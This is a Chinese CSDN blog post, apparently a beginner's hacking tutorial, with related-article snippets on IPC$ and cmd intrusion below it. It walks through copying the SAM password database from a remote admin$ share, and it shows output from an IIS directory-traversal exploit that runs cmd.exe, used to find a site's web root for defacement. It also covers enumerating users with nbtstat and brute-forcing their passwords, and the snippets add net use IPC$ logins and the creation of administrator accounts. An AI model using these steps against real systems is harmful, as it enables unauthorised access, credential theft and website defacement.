菜鸟必练入侵命令 (2)

最新推荐文章于 2024-04-29 16:33:33 发布
最新推荐文章于 2024-04-29 16:33:33 发布
阅读量477 收藏 1
点赞数
分类专栏: 黑软 文章标签: server path windows 数据库 encoding interface
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhdd1234/article/details/4376375
版权

放在x:winntrepairsam._ sam._是数据库的文件名

  下面就把127.0.0.1的数据库复制到本地C盘下

  copy 127.0.0.1admin$repairsam._ c:

  ———————-

  6:set

  如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

  下面是我得到的结果!我来分析它,只是找主页在那而已。

  COMPUTERNAME=PENTIUMII

  ComSpec=D:WINNTsystem32cmd.exe

  CONTENT_LENGTH=0

  GATEWAY_INTERFACE=CGI/1.1

  HTTP_ACCEPT=*/*

  HTTP_ACCEPT_LANGUAGE=zh-cn

  HTTP_CONNECTION=Keep-Alive

  HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了

  HTTP_ACCEPT_ENCODING=gzip, deflate

  HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

  NUMBER_OF_PROCESSORS=1

  Os2LibPath=D:WINNTsystem32os2dll;

  OS=Windows_NT

  Path=D:WINNTsystem32;D:WINNT

  PATHEXT=.COM;.EXE;.BAT;.CMD

  PATH_TRANSLATED=E:vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot

  PROCESSOR_ARCHITECTURE=x86

  PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel

  PROCESSOR_LEVEL=6

  PROCESSOR_REVISION=0303

  PROMPT=$P$G

  QUERY_STRING=/c+set

  REMOTE_ADDR=XX.XX.XX.XX

  REMOTE_HOST=XX.XX.XX.XX

  REQUEST_METHOD=GET

  script_NAME=/scripts/..%2f../winnt/system32/cmd.exe

  SERVER_NAME=XX.XX.XX.XX

  SERVER_PORT=80

  SERVER_PORT_SECURE=0

  SERVER_PROTOCOL=HTTP/1.1

  SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0

  SystemDrive=D:

  SystemRoot=D:WINNT

  TZ=GMT-9

  USERPROFILE=D:WINNTProfilesDefault User

  windir=D:WINNT

  粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

  7:nbtstat

  如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

  现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。

  命令是

  nbtstat -A XX.XX.XX.XX

  -A一定要大写哦。

  下面是得到的结果。

  NetBIOS Remote Machine Name Table

  Name Type Status

  ———————————————

  Registered Registered Registered Registered Registered Registered Registered Reg

  istered Registered Registered Registered

  MAC Address = 00-E0-29-14-35-BA

  PENTIUMII <00> UNIQUE

  PENTIUMII <20> UNIQUE

  ORAHOTOWN <00> GROUP

  ORAHOTOWN <1C> GROUP

  ORAHOTOWN <1B> UNIQUE

  PENTIUMII <03> UNIQUE

  INet~Services <1C> GROUP

  IS~PENTIUMII…<00> UNIQUE

  ORAHOTOWN <1E> GROUP

  ORAHOTOWN <1D> UNIQUE

  ..__MSBROWSE__.<01> GROUP

  粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是

 

brock
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cmd模式下的入侵技术大全
04-13 2240
 对于现在,各种入侵工具已是泛滥,有利有弊,不过我们大家(有些只会用工具而又自称为黑客的)都不应忘记我们本应有的技术.     今天我就来发个贴子,如果看了没什么用的,那就关了,如果看了受益的,就回个贴,也算是一种支持!我还会继续努力~  前言    Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些
菜鸟必练入侵命令
桦少's blog
01-30 365
1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法
Metasploit:MS10-061:入侵、提权和取证
最新发布
YJ_12340的博客
04-29 930
Metasploit Framework是一个开源渗透工具,Metasploit渗透测试框架拥有世界上最大的公共测试漏洞数据库。简单来说,Metasploit可以用来检测安全漏洞,另一方面它也可以用来进行入侵。安全事件响应和取证工具利用MSF中的攻击模块:ms10_061_spoolssWindows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。
jcifs 查找局域网计算机
zhbpd的专栏
12-04 3024
我们用jcifs 查找局域网计算机通常这样写: SmbFile[] domains = (new SmbFile("smb://")).listFiles(); 但是如果局域网内没有smb服务器,会出现异常: java.net.UnknownHostException: ..__MSBROWSE__.     at jcifs.netbios.NbtAddress.doNameQuery(
 TELNET相关命令
xiaohongyangOK的专栏
01-02 334
<br /><br />一般入侵所需要的几个常用命令,如果写得不好别笑啊。我觉得写这些更有用,不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法,我也有缺点的。 1:NET <br /><br />只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! <br /><br />这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 <br /><br />net use 127.0.0.1ipc$ "123456" /user:"hbx" <br /><br /
Nbtstat命令详解
a572893208的博客
03-04 689
  Nbtstat命令详解   显示基于 TCP/IP 的 NetBIOS (NetBT) 协议统计资料、本地计算机和远程计算机的 NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和使用 Windows Internet 名称服务 (WINS) 注册的名称。使用不带参数的 nbtstat 显示帮助。...
菜鸟程序员自学java2必备教程资料
07-22
资源名称:菜鸟程序员自学java 2必备教程资料资源目录:【】abbr_4e2ba17756f9c1a3cd49fd40e46ddf14【】abbr_52d6668dc17bc656f0d5c44bce526c32【】abbr_5cc48e1bd12d2af741fa4b92bfaa8452【】abbr_704bdbe052abfb...
菜鸟黑客入门命令收集
01-20
 退出的命令是  net use \127.0.0.1ipc$ /delte  下面的操作你必须登陆后才可以用,登陆的方法在上面。  下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户。我们加一个heibai的用户密码为...
Linux菜鸟必学的60个命令
12-09
Linux菜鸟必学的60个命令,新手必备,好用快速学习,简单明了,实用
菜鸟必备的网络探测常用命令大全
03-15
菜鸟必备的网络探测常用命令大全菜鸟必备的网络探测常用命令大全菜鸟必备的网络探测常用命令大全菜鸟必备的网络探测常用命令大全
***初级命令
weixin_33726318的博客
08-14 556
***常用的远程控制命令,想学***,不记得这些,没门....... [日期:2005-01-20]来源:本站原创 作者:笑看红尘[字体:大 中 小] 以下是***常用的远程控制命令,想学***,不记得这些,没门....... -------------------------------------------------------------------...
***(1)
weixin_34221276的博客
06-20 140
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ 123456 /user:hbx退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户。我们加一个heibai的用户密码为lovechina net ...
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
Windows 2000系统漏洞全解 1
heyongzhou的专栏
07-31 1001
登陆输入法漏洞   这里我们首先介绍一个登录错误,也就是常说的输入法漏洞。当我们启动Windows2000进行到登录验证的提示界面时,任何用户都可以打开各种输入法的帮助栏,并且可以利用其中具有的一些功能访问文件系统,这也就是说我们可以绕过了Windows2000的用户登录验证机制,并且能以最高管理员权限访问整个系统。所以说这个漏洞的危害性是很大的,而且当我们进入系统后,还可以利用Terminal
Tracert 命令使用说明图解
weixin_30544657的博客
06-12 597
点评:Tracert命令诊断实用程序通过向目标计算机发送具有不同生存时间的ICMP数据包,来确定至目标计算机的路由,也就是说用来跟踪一个消息从一台计算机到另一台计算机所走的路径。 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送 Tracert命令诊断实用程序通过向目标计算机发送具有不同生存时间的ICMP数据包,来确定至...
cmd 命令 大全
HWP
11-05 5万+
记事本格式:https://download.csdn.net/download/weixin_42859280/10942914 前言: CMD是什么?在windows环境下,命令行程序为cmd.exe。 是一个32位的命令行程序,微软Windows系统基于Windows上的命令解释程序。 类似于微软的DOS操作系统。输入一些命令,cmd.exe可以执行。 比如输入shutdown ...
做黑客必须熟悉这些CMD命令!!
选择飞翔
11-20 1995
net use ipipc$ " " /user:" " 建立IPC空链接    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接    net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:    net use h: ipc$ 登陆后映射对方C:到本地为H:    net use ipipc$ /del 删
git命令大全 菜鸟教程
06-07
2. git clone:克隆一个 Git 仓库。 3. git add:添加文件到 Git 仓库。 4. git commit:提交文件到 Git 仓库。 5. git status:查看 Git 仓库的状态。 6. git log:查看 Git 仓库的提交历史。 7. git diff:查看...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值